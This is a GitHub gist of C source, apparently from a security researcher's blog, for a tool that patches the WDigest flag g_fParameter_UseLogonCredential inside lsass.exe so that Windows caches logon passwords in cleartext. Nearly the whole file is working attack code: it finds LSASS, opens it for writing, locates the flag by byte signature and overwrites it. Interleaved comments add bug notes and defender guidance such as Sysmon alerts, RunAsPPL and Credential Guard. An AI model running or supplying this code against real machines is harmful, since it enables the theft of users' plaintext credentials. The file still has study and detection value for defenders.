
@xpn

xpn/wdigest_on.c Secret

Created May 8, 2019 23:03
#blog
#include <stdio.h>
#include <windows.h>
#include <tlhelp32.h>
// Byte pattern scanned for inside wdigest.dll; it is the machine code that
// precedes the RIP-relative operand of
//   cmp dword ptr [wdigest!g_fParameter_UseLogonCredential],ebx
// A hard-coded code pattern like this is presumably tied to one particular
// wdigest.dll build (not stated here) and will not match other builds.
// NOTE(review): the same bytes embedded in a non-system executable are a
// useful on-disk indicator for hunting copies of this tool.
unsigned char signature[] = { 0xf7, 0x47, 0x50, 0x00, 0x08, 0x00, 0x00, 0x0f, 0x85, 0xfe, 0x71, 0x00, 0x00, 0x39, 0x1d };
// Open a handle to the LSASS process.
//
// pid: process ID, as returned by GetLsassPid().
// Returns whatever OpenProcess() returns; per the Win32 API that is NULL
// (not INVALID_HANDLE_VALUE) on failure.
//
// The requested rights include PROCESS_VM_WRITE. Legitimate software almost
// never opens lsass.exe for writing, so this single call is the high-signal
// event defenders alert on (e.g. Sysmon Event ID 10 / ProcessAccess with
// lsass.exe as the target image), and it fails outright when LSA runs as a
// protected process (RunAsPPL) or under Credential Guard.
HANDLE GrabLsassHandle(int pid) {
    HANDLE procHandle = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_VM_WRITE, FALSE, pid);
    return procHandle;
}
// Write a buffer into the LSASS process's address space.
//
// hLsass:   handle obtained from GrabLsassHandle() (needs PROCESS_VM_WRITE).
// addr:     destination address inside lsass.exe.
// memIn:    source buffer in the calling process.
// memInLen: number of bytes to copy.
// Returns the byte count reported by WriteProcessMemory(). The call's BOOL
// result is ignored, so a returned 0 (bytesWritten is pre-initialised to 0)
// is the only failure signal a caller can observe.
SIZE_T WriteToLsass(HANDLE hLsass, void* addr, void *memIn, int memInLen) {
    SIZE_T bytesWritten = 0;
    WriteProcessMemory(hLsass, addr, memIn, memInLen, &bytesWritten);
    return bytesWritten;
}
// Look up the PID of lsass.exe by walking a Toolhelp32 process snapshot.
//
// Returns the th32ProcessID of the first entry whose szExeFile equals
// "lsass.exe" (wide-string compare, so this is a UNICODE build), or 0 when
// no such entry exists.
// Note: the entry filled in by Process32First() is never compared, only the
// ones returned by Process32Next(); and on the found path the function
// returns before CloseHandle(hSnapshot), so that snapshot handle leaks.
int GetLsassPid() {
    PROCESSENTRY32 entry;
    entry.dwSize = sizeof(PROCESSENTRY32);
    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
    if (Process32First(hSnapshot, &entry)) {
        while (Process32Next(hSnapshot, &entry)) {
            if (wcscmp(entry.szExeFile, L"lsass.exe") == 0) {
                return entry.th32ProcessID;
            }
        }
    }
    CloseHandle(hSnapshot);
    return 0;
}
// Locate wdigest!g_fParameter_UseLogonCredential and set it to 1 inside LSASS.
//
// hLsass: handle to lsass.exe with PROCESS_VM_WRITE access.
// Returns 1 on the two error paths below. There is no return statement on
// the success path, so the int result is indeterminate there; main() does
// not read it.
//
// How it works: wdigest.dll is loaded into *this* process and scanned for
// `signature`; the displacement that follows the matched bytes is resolved
// to the global's address, and that address is then written in lsass.exe on
// the assumption (stated at the WriteToLsass call) that the DLL is mapped at
// the same base in both processes.
//
// Defender notes: this patches the in-memory flag directly, so the registry
// value that normally controls WDigest credential caching is bypassed and
// setting it to 0 is not a mitigation against this technique; LSA protection
// (RunAsPPL) or Credential Guard is, because the write into LSASS is
// refused. A non-LSASS process loading wdigest.dll and then writing to
// lsass.exe is the behavioural pattern to detect.
int ToggleWDigest(HANDLE hLsass) {
    unsigned char* ptr = 0;
    ULONG value = 1;
    // Map a private copy of wdigest.dll into this process to scan it.
    ptr = (unsigned char*)LoadLibraryA("wdigest.dll");
    if (ptr == NULL) {
        printf("[x] Error: Could not load wdigest.dll into process\n");
        return 1;
    }
    printf("[*] Searching for g_fParameter_UseLogonCredential\n");
    // Linear scan over a fixed 0x220000-byte window; the two-byte pre-check
    // avoids a full memcmp at every offset.
    for (int i = 0; i < 0x220000; i++) {
        if (ptr[i] == signature[0] && ptr[i + 1] == signature[1]) {
            if (memcmp(ptr + i, signature, sizeof(signature)) == 0) {
                // Skip past the matched bytes to the 32-bit displacement, then
                // resolve it relative to the end of that 4-byte operand.
                ptr += i + sizeof(signature);
                ptr += (*(DWORD*)ptr) + 4;
                break;
            }
        }
    }
    if (ptr == (unsigned char*)0) {
        printf("[x] Error: Could not find signature in wdigest.dll\n");
        return 1;
    }
    printf("[*] Found g_fParameter_UseLogonCredential at %p\n", ptr);
    printf("[*] Toggling g_fParameter_UseLogonCredential to 1 in lsass.exe\n");
    // No need to check in lsass, as Windows ASLR loads at the same address across processes
    // (image bases are randomised per boot, not per process, so the address
    // found here is reused for lsass.exe without verification).
    WriteToLsass(hLsass, ptr, &value, sizeof(value));
    printf("[*] Done... wdigest credential caching should now be on\n");
}
// Entry point: find lsass.exe, open it, and hand the handle to ToggleWDigest().
//
// Returns 1 if lsass.exe cannot be found or opened; otherwise falls off the
// end, which C99+ treats as returning 0 from main().
// Opening LSASS with the rights GrabLsassHandle() requests presumably needs
// an administrative token with SeDebugPrivilege; the program does not enable
// that privilege itself, so it relies on the caller's existing token.
int main()
{
    int lsassPid;
    HANDLE hLsass;
    printf("[ WDigest Toggle ]\n");
    printf(" @_xpn_\n\n");
    lsassPid = GetLsassPid();
    if (lsassPid == 0) {
        printf("[x] Error: Could not find lsass.exe process\n");
        return 1;
    }
    hLsass = GrabLsassHandle(lsassPid);
    // Compared against INVALID_HANDLE_VALUE; see GrabLsassHandle() for what
    // OpenProcess() actually returns on failure.
    if (hLsass == INVALID_HANDLE_VALUE) {
        printf("[x] Error: Could not open lsass.exe\n");
        return 1;
    }
    ToggleWDigest(hLsass);
}